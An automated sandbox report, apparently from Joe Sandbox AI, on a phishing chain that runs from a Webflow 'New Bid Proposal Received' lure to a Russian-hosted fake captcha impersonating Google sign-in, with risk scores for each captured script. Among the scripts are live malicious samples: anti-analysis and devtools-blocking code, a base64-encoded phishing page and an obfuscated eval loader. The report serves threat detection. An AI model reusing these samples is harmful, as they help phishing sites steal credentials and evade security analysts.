| URL: https://z97f4f2525fyg27.webflow.io Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": true,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: https://z97f4f2525fyg27.webflow.io |
| URL: https://cdn.prod.website-files.com/677bf3725c7ee1e... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a part of the Webflow front-end site library, which is a legitimate and widely used web development tool. The code does not contain any high-risk indicators, such as dynamic code execution, data exfiltration, or redirects to malicious domains. It primarily consists of utility functions and definitions related to the Webflow library. While the code uses some legacy practices like `XDomainRequest`, these are not inherently malicious and are likely used for compatibility reasons. Overall, the script seems to be a benign part of a legitimate web development framework, with a low risk score."
} |
/*!
* Webflow: Front-end site library
* @license MIT
* Inline scripts may access the api using an async handler:
* var Webflow = Webflow || [];
* Webflow.push(readyFunction);
*/
(()=>{var lt=(e,y)=>()=>(y||e((y={exports:{}}).exports,y),y.exports);var Pt=lt(()=>{"use strict";window.tram=function(e){function y(t,n){var i=new J.Bare;return i.init(t,n)}function l(t){return t.replace(/[A-Z]/g,function(n){return"-"+n.toLowerCase()})}function T(t){var n=parseInt(t.slice(1),16),i=n>>16&255,r=n>>8&255,s=255&n;return[i,r,s]}function C(t,n,i){return"#"+(1<<24|t<<16|n<<8|i).toString(16).slice(1)}function g(){}function L(t,n){B("Type warning: Expected: ["+t+"] Got: ["+typeof n+"] "+n)}function _(t,n,i){B("Units do not match ["+t+"]: "+n+", "+i)}function I(t,n,i){if(n!==void 0&&(i=n),t===void 0)return i;var r=i;return we.test(t)||!Xt.test(t)?r=parseInt(t,10):Xt.test(t)&&(r=1e3*parseFloat(t)),0>r&&(r=0),r===r?r:i}function B(t){et.debug&&window&&window.console.warn(t)}function U(t){for(var n=-1,i=t?t.length:0,r=[];++n<i;){var s=t[n];s&&r.push(s)}return r}var P=function(t,n,i){function r(x){return typeof x=="object"}function s(x){return typeof x=="function"}function o(){}function p(x,K){function c(){var j=new A;return s(j.init)&&j.init.apply(j,arguments),j}function A(){}K===i&&(K=x,x=Object),c.Bare=A;var z,Z=o[t]=x[t],ft=A[t]=c[t]=new o;return ft.constructor=c,c.mixin=function(j){return A[t]=c[t]=p(c,j)[t],c},c.open=function(j){if(z={},s(j)?z=j.call(c,ft,Z,c,x):r(j)&&(z=j),r(z))for(var At in z)n.call(z,At)&&(ft[At]=z[At]);return s(ft.init)||(ft.init=x),c},c.open(K)}return p}("prototype",{}.hasOwnProperty),R={ease:["ease",function(t,n,i,r){var s=(t/=r)*t,o=s*t;return n+i*(-2.75*o*s+11*s*s+-15.5*o+8*s+.25*t)}],"ease-in":["ease-in",function(t,n,i,r){var s=(t/=r)*t,o=s*t;return n+i*(-1*o*s+3*s*s+-3*o+2*s)}],"ease-out":["ease-out",function(t,n,i,r){var s=(t/=r)*t,o=s*t;return n+i*(.3*o*s+-1.6*s*s+2.2*o+-1.8*s+1.9*t)}],"ease-in-out":["ease-in-out",function(t,n,i,r){var s=(t/=r)*t,o=s*t;return n+i*(2*o*s+-5*s*s+2*o+2*s)}],linear:["linear",function(t,n,i,r){return i*t/r+n}],"ease-in-quad":["cubic-bezier(0.550, 0.085, 0.680, 0.530)",function(t,n,i,r){return i*(t/=r)*t+n}],"ease-out-quad":["cubic-bezier(0.250, 0.460, 0.450, 0.940)",function(t,n,i,r){return-i*(t/=r)*(t-2)+n}],"ease-in-out-quad":["cubic-bezier(0.455, 0.030, 0.515, 0.955)",function(t,n,i,r){return(t/=r/2)<1?i/2*t*t+n:-i/2*(--t*(t-2)-1)+n}],"ease-in-cubic":["cubic-bezier(0.550, 0.055, 0.675, 0.190)",function(t,n,i,r){return i*(t/=r)*t*t+n}],"ease-out-cubic":["cubic-bezier(0.215, 0.610, 0.355, 1)",function(t,n,i,r){return i*((t=t/r-1)*t*t+1)+n}],"ease-in-out-cubic":["cubic-bezier(0.645, 0.045, 0.355, 1)",function(t,n,i,r){return(t/=r/2)<1?i/2*t*t*t+n:i/2*((t-=2)*t*t+2)+n}],"ease-in-quart":["cubic-bezier(0.895, 0.030, 0.685, 0.220)",function(t,n,i,r){return i*(t/=r)*t*t*t+n}],"ease-out-quart":["cubic-bezier(0.165, 0.840, 0.440, 1)",function(t,n,i,r){return-i*((t=t/r-1)*t*t*t-1)+n}],"ease-in-out-quart":["cubic-bezier(0.770, 0, 0.175, 1)",function(t,n,i,r){return(t/=r/2)<1?i/2*t*t*t*t+n:-i/2*((t-=2)*t*t*t-2)+n}],"ease-in-quint":["cubic-bezier(0.755, 0.050, 0.855, 0.060)",function(t,n,i,r){return i*(t/=r)*t*t*t*t+n}],"ease-out-quint":["cubic-bezier(0.230, 1, 0.320, 1)",function(t,n,i,r){return i*((t=t/r-1)*t*t*t*t+1)+n}],"ease-in-out-quint":["cubic-bezier(0.860, 0, 0.070, 1)",function(t,n,i,r){return(t/=r/2)<1?i/2*t*t*t*t*t+n:i/2*((t-=2)*t*t*t*t+2)+n}],"ease-in-sine":["cubic-bezier(0.470, 0, 0.745, 0.715)",function(t,n,i,r){return-i*Math.cos(t/r*(Math.PI/2))+i+n}],"ease-out-sine":["cubic-bezier(0.390, 0.575, 0.565, 1)",function(t,n,i,r){return i*Math.sin(t/r*(Math.PI/2))+n}],"ease-in-out-sine":["cubic-bezier(0.445, 0.050, 0.550, 0.950)",function(t,n,i,r){return-i/2*(Math.cos(Math.PI*t/r)-1)+n}],"ease-in-expo":["cubic-bezier(0.950, 0.050, 0.795, 0.035)",function(t,n,i,r){return t===0?n:i*Math.pow(2,10*(t/r-1))+n}],"ease-out-expo":["cubic-bezier(0.190, 1, 0.220, 1)",function(t,n,i,r){retur |
| URL: https://hs.orybisonym.ru/6fdy/... Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious domain (Google login page) after a delay. These behaviors indicate a strong likelihood of malicious intent, such as attempting to bypass security measures and potentially steal user credentials."
} |
if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) {
window.location = "about:blank";
}
document.addEventListener('keydown', function(event) {
if (event.keyCode === 123) {
event.preventDefault();
return false;
}
if (
(event.ctrlKey && event.keyCode === 85) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 73) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 67) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 74) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 75) ||
(event.ctrlKey && event.keyCode === 72) ||
(event.metaKey && event.altKey && event.keyCode === 73) ||
(event.metaKey && event.altKey && event.keyCode === 67) ||
(event.metaKey && event.keyCode === 85)
) {
event.preventDefault();
return false;
}
});
document.addEventListener('contextmenu', function(event) {
event.preventDefault();
return false;
});
DXaNmlwFXS = false;
(function VWSeCfhwVG() {
let LZtDVPuhnu = false;
const ZkENuMudAB = 100;
setInterval(function() {
const sXeGANyCFZ = performance.now();
debugger;
const PPWTRVGaIy = performance.now();
if (PPWTRVGaIy - sXeGANyCFZ > ZkENuMudAB && !LZtDVPuhnu) {
DXaNmlwFXS = true;
LZtDVPuhnu = true;
window.location.replace('https://accounts.google.com/');
}
}, 100);
})();
|
| URL: https://hs.orybisonym.ru/6fdy/... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. While the script may have a legitimate purpose, such as displaying a CAPTCHA, the use of obfuscated code and interactions with untrusted domains raise significant security concerns. Further investigation is warranted to determine the true intent and potential impact of this script."
} |
if(atob("aHR0cHM6Ly9IRnlQLm9yeWJpc29ueW0ucnUvNmZkeS8=") == "nomatch"){
document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4NCiAgICA8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9Im5vaW5kZXgsIG5vZm9sbG93Ij4NCiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+DQogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPg0KPHN0eWxlPg0KYm9keSwgaHRtbCB7DQptYXJnaW46IDA7DQpwYWRkaW5nOiAwOw0KaGVpZ2h0OiAxMDAlOw0Kb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCg0KLmJhY2tncm91bmQtY29udGFpbmVyIHsNCiAgICBwb3NpdGlvbjogcmVsYXRpdmU7DQogICAgaGVpZ2h0OiAxMDAlOw0KICAgIHdpZHRoOiAxMDAlOw0KfQ0KLmJhY2tncm91bmQtY29udGFpbmVyIC5iYWNrZ3JvdW5kIHsNCiAgICBjb250ZW50OiAiIjsNCiAgICBwb3NpdGlvbjogYWJzb2x1dGU7DQogICAgdG9wOiAwOw0KICAgIGxlZnQ6IDA7DQogICAgcmlnaHQ6IDA7DQogICAgYm90dG9tOiAwOw0KICAgIGJhY2tncm91bmQ6IHdoaXRlOw0KICAgIGJhY2tncm91bmQtc2l6ZTogY292ZXI7DQogICAgYmFja2dyb3VuZC1yZXBlYXQ6IG5vLXJlcGVhdDsNCiAgICBiYWNrZ3JvdW5kLXBvc2l0aW9uOiBjZW50ZXI7DQogICAgZmlsdGVyOiBibHVyKDVweCk7DQogICAgei1pbmRleDogLTE7DQp9DQouY29udGVudCB7DQogICAgcG9zaXRpb246IHJlbGF0aXZlOw0KICAgIHotaW5kZXg6IDE7DQogICAgZGlzcGxheTogZmxleDsNCiAgICBqdXN0aWZ5LWNvbnRlbnQ6IGNlbnRlcjsNCiAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgIGhlaWdodDogMTAwJTsNCiAgICBjb2xvcjogd2hpdGU7DQogICAgZm9udC1zaXplOiAyNHB4Ow0KICAgIHRleHQtYWxpZ246IGNlbnRlcjsNCn0NCi5jYXB0Y2hhLWJveCB7DQogICAgZGlzcGxheTogZmxleDsNCiAgICBiYWNrZ3JvdW5kOiAjMDAwMDAwOGE7DQogICAgZmxleC1kaXJlY3Rpb246IGNvbHVtbjsNCiAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgIGp1c3RpZnktY29udGVudDogc3BhY2UtYmV0d2VlbjsNCiAgICBib3JkZXI6IDFweCBzb2xpZCAjMGYwZTBlOw0KICAgIHBhZGRpbmc6IDIwcHggMTBweDsNCiAgICB3aWR0aDogMzAwcHg7DQogICAgbWFyZ2luOiAyMHB4IGF1dG87DQogICAgYm9yZGVyLXJhZGl1czogNHB4Ow0KICAgIGJveC1zaGFkb3c6IDBweCAycHggNHB4IHJnYmEoMCwgMCwgMCwgMC4yKTsNCiAgICBwb3NpdGlvbjogcmVsYXRpdmU7DQp9DQoNCi5jYXB0Y2hhLWNoZWNrYm94IHsNCiAgICBkaXNwbGF5OiBmbGV4Ow0KICAgIGhlaWdodDogMjBweDsNCiAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgIHBvc2l0aW9uOiByZWxhdGl2ZTsNCn0NCg0KLmNhcHRjaGEtY2hlY2tib3ggaW5wdXRbdHlwZT0iY2hlY2tib3giXSB7DQogICAgZGlzcGxheTogbm9uZTsNCn0NCg0KLmNhcHRjaGEtY2hlY2tib3ggbGFiZWwgew0KICAgIGRpc3BsYXk6IGZsZXg7DQogICAgYWxpZ24taXRlbXM6IGNlbnRlcjsNCiAgICBjdXJzb3I6IHBvaW50ZXI7DQp9DQoNCi5jYXB0Y2hhLWNoZWNrbWFyayB7DQogICAgd2lkdGg6IDIwcHg7DQogICAgaGVpZ2h0OiAyMHB4Ow0KICAgIGJvcmRlcjogMnB4IHNvbGlkICNkM2QzZDM7DQogICAgYm9yZGVyLXJhZGl1czogM3B4Ow0KICAgIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogICAgLyogbWFyZ2luLXJpZ2h0OiAxMHB4OyAqLw0KICAgIHBvc2l0aW9uOiByZWxhdGl2ZTsNCn0NCg0KLmNhcHRjaGEtY2hlY2tib3ggaW5wdXRbdHlwZT0iY2hlY2tib3giXTpjaGVja2VkICsgbGFiZWwgLmNhcHRjaGEtY2hlY2ttYXJrOjphZnRlciB7DQogICAgY29udGVudDogIiI7DQogICAgcG9zaXRpb246IGFic29sdXRlOw0KICAgIGxlZnQ6IDVweDsNCiAgICB0b3A6IDFweDsNCiAgICB3aWR0aDogNnB4Ow0KICAgIGhlaWdodDogMTJweDsNCiAgICBib3JkZXI6IHNvbGlkICM0Y2FmNTA7DQogICAgYm9yZGVyLXdpZHRoOiAwIDNweCAzcHggMDsNCiAgICB0cmFuc2Zvcm06IHJvdGF0ZSg0NWRlZyk7DQp9DQoNCi5jYXB0Y2hhLXRleHQgew0KICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgc2Fucy1zZXJpZjsNCiAgICBmb250LXNpemU6IDE0cHg7DQogICAgbGVmdDogNnB4Ow0KICAgIGNvbG9yOiAjZmZmZmZmOw0KICAgIHBvc2l0aW9uOiByZWxhdGl2ZTsNCn0NCg0KLmNhcHRjaGEtbG9nbyBpbWcgew0KICAgIGhlaWdodDogNDBweDsNCiAgICB0b3A6IDBweDsNCiAgICByaWdodDogMDsNCiAgICBmbG9hdDogcmlnaHQ7DQogICAgcG9zaXRpb246IHJlbGF0aXZlOw0KfQ0KDQouY2FwdGNoYS1sb2FkZXIgew0KIGJhY2tncm91bmQtY29sb3I6I2Y5ZjlmOTsNCiBib3JkZXI6NnB4IHNvbGlkICM0ZDkwZmU7DQogYm9yZGVyLXJhZGl1czozNnB4Ow0KIGJvcmRlci1ib3R0b20tY29sb3I6dHJhbnNwYXJlbnQ7DQogYm9yZGVyLXJpZ2h0LWNvbG9yOnRyYW5zcGFyZW50Ow0KIGhlaWdodDozNnB4Ow0KIG91dGxpbmU6MDsNCiBwb3NpdGlvbjpyZWxhdGl2ZTsNCiAvKnJpZ2h0OiAxODJweDsqLw0KIHdpZHRoOjM2cHg7DQogYm94LXNpemluZzpib3JkZXItYm94Ow0KIGFuaW1hdGlvbjogc3BpbiBsaW5lYXIgMXMgaW5maW5pdGU7DQogZGlzcGxheTogbm9uZTsNCn0NCg0KQGtleWZyYW1lcyBzcGluIHsNCiAgICAwJSB7IHRyYW5zZm9ybTogcm90YXRlKDBkZWcpOyB9DQogICAgMTAwJSB7IHRyYW5zZm9ybTogcm90YXRlKDM2MGRlZyk7IH0NCn0NCg0KLmNhcHRjaGEtY29udGVudCB7DQogICAgZGlzcGxh |
| URL: https://hs.orybisonym.ru/6fdy/... Model: Joe Sandbox AI | {
"risk_score": 10,
"reasoning": "This script demonstrates multiple high-risk behaviors, including dynamic code execution via the Proxy object and eval, potential data exfiltration, and obfuscated code. The combination of these factors indicates a high likelihood of malicious intent, warranting a maximum risk score of 10."
} |
new Proxy({},{get:(_,n)=>eval([...n].map(n=>+("">n)).join``.replace(/.{8}/g,n=>String.fromCharCode(+("0b"+n))))}).
|
| URL: https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "This appears to be the jQuery library, which is a widely used and trusted JavaScript library. The code does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or suspicious redirects. The behaviors observed are typical of a legitimate JavaScript library, including DOM manipulation, event handling, and utility functions. While the code uses some legacy practices like `XDomainRequest`, these pose minor risks and are not inherently malicious. Overall, this script is likely benign and does not demonstrate any suspicious or malicious behavior."
} |
/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var f="3.5.1",S=function(e,t){return new S.fn.init(e,t)};function p(e){var t=!!e&&"length"in e&&e.length,n=w(e);return!m(e)&&!x(e)&&("array"===n||0===t||"number"==typeof t&&0<t&&t-1 in e)}S.fn=S.prototype={jquery:f,constructor:S,length:0,toArray:function(){return s.call(this)},get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,function(e,t){return n.call(e,t,e)}))},slice:function(){return this.pushStack(s.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(S.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(S.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:u,sort:t.sort,splice:t.splice},S.extend=S.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||m(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)r=e[t],"__proto__"!==t&&a!==r&&(l&&r&&(S.isPlainObject(r)||(i=Array.isArray(r)))?(n=a[t],o=i&&!Array.isArray(n)?[]:i||S.isPlainObject(n)?n:{},i=!1,a[t]=S.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},S.extend({expando:"jQuery"+(f+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.nonce},n)},each:function(e,t){var n,r=0;if(p(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},makeArray:function(e,t){var n=t||[];return null!=e&&(p(Object(e))?S.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){var r,i,o=0,a=[];if(p(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&a.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&a.push(i);return g(a)},guid:1,support:y}),"function"==typeof Symbol&&(S.fn[Symbol.iterator]=t[Symbol.iterator]),S.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){n["[object "+t+"]"]=t.toLowerCase()});var d=function(n){var e,d,b,o,i,h,f,g,w,u,l,T,C,a,E,v,s,c,y,S="sizzle"+1*new Date,p=n.document, |
| URL: https://hs.orybisonym.ru/6fdy/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "I am not a robot",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://z97f4f2525fyg27.webflow.io/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "New Bid Proposal Received",
"prominent_button_name": "VIEW DASHBOARD",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": true,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://hs.orybisonym.ru Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: https://hs.orybisonym.ru |
| URL: https://hs.orybisonym.ru/6fdy/ Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: https://code.jquery.com/jquery-3.6.0.min.js... Model: Joe Sandbox AI | ```json
{
"risk_score": 1,
"reasoning": "The provided JavaScript snippet is a part of the jQuery library, which is a widely used and reputable open-source library for DOM manipulation and event handling. The code does not exhibit any high-risk or moderate-risk behaviors such as dynamic code execution, data exfiltration, or redirects to suspicious domains. It primarily consists of utility functions and object manipulations typical of a library. There are no interactions with external domains or obfuscated code present. Therefore, it is considered low risk."
} |
/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var f="3.6.0",S=function(e,t){return new S.fn.init(e,t)};function p(e){var t=!!e&&"length"in e&&e.length,n=w(e);return!m(e)&&!x(e)&&("array"===n||0===t||"number"==typeof t&&0<t&&t-1 in e)}S.fn=S.prototype={jquery:f,constructor:S,length:0,toArray:function(){return s.call(this)},get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,function(e,t){return n.call(e,t,e)}))},slice:function(){return this.pushStack(s.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(S.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(S.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:u,sort:t.sort,splice:t.splice},S.extend=S.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||m(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)r=e[t],"__proto__"!==t&&a!==r&&(l&&r&&(S.isPlainObject(r)||(i=Array.isArray(r)))?(n=a[t],o=i&&!Array.isArray(n)?[]:i||S.isPlainObject(n)?n:{},i=!1,a[t]=S.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},S.extend({expando:"jQuery"+(f+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.nonce},n)},each:function(e,t){var n,r=0;if(p(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},makeArray:function(e,t){var n=t||[];return null!=e&&(p(Object(e))?S.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){var r,i,o=0,a=[];if(p(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&a.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&a.push(i);return g(a)},guid:1,support:y}),"function"==typeof Symbol&&(S.fn[Symbol.iterator]=t[Symbol.iterator]),S.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){n["[object "+t+"]"]=t.toLowerCase()});var d=function(n){var e,d,b,o,i,h,f,g,w,u,l,T,C,a,E,v,s,c,y,S="s |
| URL: https://z97f4f2525fyg27.webflow.io/ Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: https://hs.orybisonym.ru/6fdy/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "I am not a robot",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://hs.orybisonym.ru/6fdy/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Submit",
"text_input_field_labels": [
"Enter the result"
],
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://hs.orybisonym.ru/6fdy/ Model: Joe Sandbox AI | {
"brands": [
"Google"
]
} |
|
| URL: https://hs.orybisonym.ru/6fdy/ Model: Joe Sandbox AI | {
"brands": [
"Google"
]
} |
|
| URL: https://hs.orybisonym.ru/6fdy/ Model: Joe Sandbox AI | ```json{ "legit_domain": "google.com", "classification": "wellknown", "reasons": [ "The brand 'Google' is well-known and typically associated with the domain 'google.com'.", "The URL 'hs.orybisonym.ru' does not match the legitimate domain for Google.", "The domain 'orybisonym.ru' is unrelated to Google and uses a Russian domain extension, which is unusual for Google services.", "The presence of a subdomain 'hs' does not align with Google's typical domain structure.", "The URL contains no direct reference to Google, which is suspicious given the brand association." ], "riskscore": 9}
Google indexed: False |
URL: hs.orybisonym.ru
Brands: Google
Input Fields: Enter the result |
| URL: https://www.gstatic.com/_/mss/boq-identity/_/js/k=... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a part of a larger application and does not contain any high-risk indicators. It primarily involves setting up and executing various utility functions related to user authentication and caching. While it uses some legacy APIs like `XDomainRequest`, the overall behavior seems to be within the expected range for a legitimate application. The script does not exhibit any clear signs of malicious intent or data exfiltration, and the interactions are with trusted domains. Therefore, the risk score is assessed as low."
} |
"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;
try{
_.k("lOO0Vd");
_.a2a=new _.Df(_.hma);
_.l();
_.k("ZDZcre");
var T2a=function(){this.Lo=_.Mu(_.RG);this.g6=_.Mu(_.a2a);this.aa=_.Mu(_.QG)};T2a.prototype.execute=function(a){var b=this;a=this.aa.create(a);return _.Fb(a,function(c){var d=b.g6.getType(c.Xd())===2?b.Lo.Nb(c):b.Lo.fetch(c);return _.om(c,_.SG)?d.then(function(e){return _.Nd(e)}):d},this)};_.Pu(T2a,_.jma);
_.l();
_.k("w9hDv");
_.Pg(_.$la);_.MA=function(a){_.Kt.call(this);this.aa=a.Ya.cache};_.K(_.MA,_.Ku);_.MA.Ca=function(){return{Ya:{cache:_.Et}}};_.MA.prototype.execute=function(a){_.Fb(a,function(b){var c;_.of(b)&&(c=b.jb.hc(b.ob));c&&this.aa.cJ(c)},this);return{}};_.Ou(_.fma,_.MA);
_.l();
_.k("K5nYTd");
_.$1a=new _.Df(_.gma);
_.l();
_.k("sP4Vbe");
_.l();
_.k("kMFpHd");
_.l();
_.k("A7fCU");
